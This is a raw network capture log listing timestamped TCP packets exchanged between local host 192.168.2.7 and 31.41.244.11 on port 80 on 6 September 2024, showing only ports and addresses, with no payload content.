Sep 6, 2024 09:58:06.565100908 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.565112114 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.565112114 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.565124989 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.565138102 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.565149069 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.565150976 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.565165043 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.565171003 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.565179110 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.565198898 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.565215111 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.595366001 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.595400095 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.595413923 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.595427036 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.595442057 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.595455885 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.595458031 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.595468998 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.595483065 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.595493078 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.595525980 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.614048004 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.614090919 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.614104033 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.614116907 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.614129066 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.614135027 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.614150047 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.614164114 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.614175081 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.614180088 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.614190102 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.614202976 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.614203930 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.614217997 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.614222050 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.614231110 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.614247084 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.614253998 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.614262104 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.614274979 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.614283085 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.614301920 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.614317894 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.650898933 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.650928020 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.650969982 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.650974989 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.650994062 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.651000977 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.651019096 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.651021957 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.651031017 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.651031971 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.651045084 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.651057005 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.651060104 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.651068926 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.651081085 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.651082993 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.651092052 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.651104927 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.651117086 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.651125908 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.651129961 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.651155949 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.651177883 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.651305914 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.651318073 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.651336908 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.651350021 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.651365042 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.651377916 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.651380062 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.651397943 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.651410103 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.651410103 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.651424885 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.651443005 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.651484013 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.651979923 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.651993036 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.652004004 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.652017117 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.652029037 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.652033091 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.652041912 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.652055025 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.652061939 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.652070045 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.652082920 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.652415991 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.652594090 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.652606010 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.652626038 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.652652979 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.652693987 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.652710915 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.652723074 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.652734995 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.652751923 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.652757883 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.652765036 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.652785063 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.652817011 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.653472900 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.653503895 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.653516054 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.653533936 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.653551102 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.653569937 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.653609991 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.653636932 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.653650999 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.653661013 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.653662920 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.653675079 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.653687000 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.653692961 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.653702021 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.653703928 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.653733015 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.653740883 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.653743982 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.653753042 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.653764963 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.653778076 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.653780937 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.653789997 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.653800964 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.653827906 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.654160976 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654172897 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654184103 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654212952 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.654225111 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654236078 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654236078 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.654247999 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654259920 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654264927 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.654284000 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.654309988 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.654331923 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654344082 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654356003 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654371977 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654392004 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654405117 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654408932 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.654423952 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654432058 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.654444933 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654450893 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.654479980 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.654504061 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654505014 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.654620886 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654639959 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654652119 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654661894 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.654666901 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654680967 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.654695988 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.654700041 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654712915 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654715061 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.654723883 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654736042 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654742002 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.654748917 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654767036 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.654793024 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654793978 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.654810905 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654823065 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654834986 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654848099 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654850960 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.654860020 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.654870033 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.654898882 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.655389071 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.655426025 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.655437946 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.655473948 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.655502081 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.655570030 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.655580997 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.655586004 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.655599117 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.655620098 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.655653000 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.655678034 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.655689955 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.655702114 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.655715942 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.655725956 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.655729055 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.655746937 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.655751944 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.655761003 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.655766964 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.655791998 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.686258078 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.686280966 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.686306000 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.686319113 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.686337948 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.686347008 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.686359882 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.686373949 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.686373949 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.686388969 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.686412096 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.686429977 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.705018997 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.705046892 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.705060959 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.705074072 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.705090046 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.705094099 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.705110073 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.705123901 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.705132961 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.705173969 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.741792917 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.741811037 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.741825104 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.741868973 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.741893053 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.741905928 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.741942883 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.742027044 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742036104 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742046118 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742062092 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742073059 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.742075920 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742089033 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742110968 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.742126942 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.742129087 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742142916 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742155075 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742166996 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742177963 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742189884 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742214918 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.742216110 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.742223978 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742234945 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742247105 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742249966 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.742249966 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.742260933 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742271900 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.742300034 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742310047 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.742350101 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.742388010 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742430925 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742443085 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742456913 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742471933 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.742496014 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.742511034 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.742584944 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742595911 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742608070 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742652893 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.742753029 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742800951 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.742810965 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742857933 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742914915 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.742944002 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742954969 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.742991924 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.743000984 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.743002892 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.743015051 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.743033886 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.743068933 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.743534088 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.743576050 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.743582964 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.743609905 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.743630886 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.743748903 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.743761063 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.743772984 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.743789911 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.743794918 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.743824005 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.743843079 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.744442940 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.744503021 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.744518042 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.744529963 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.744568110 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.744587898 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.744601011 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.744611979 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.744625092 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.744635105 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.744669914 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.744683981 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.744699001 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.744710922 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.744719982 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.744724989 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.744744062 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.744749069 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.744756937 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.744769096 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.744786978 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.744801044 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.744828939 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.744895935 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.744942904 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.745098114 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745110035 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745122910 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745152950 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.745192051 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.745246887 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745261908 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745273113 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745287895 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.745299101 CEST	49719	80	192.168.2.7	31.41.244.11
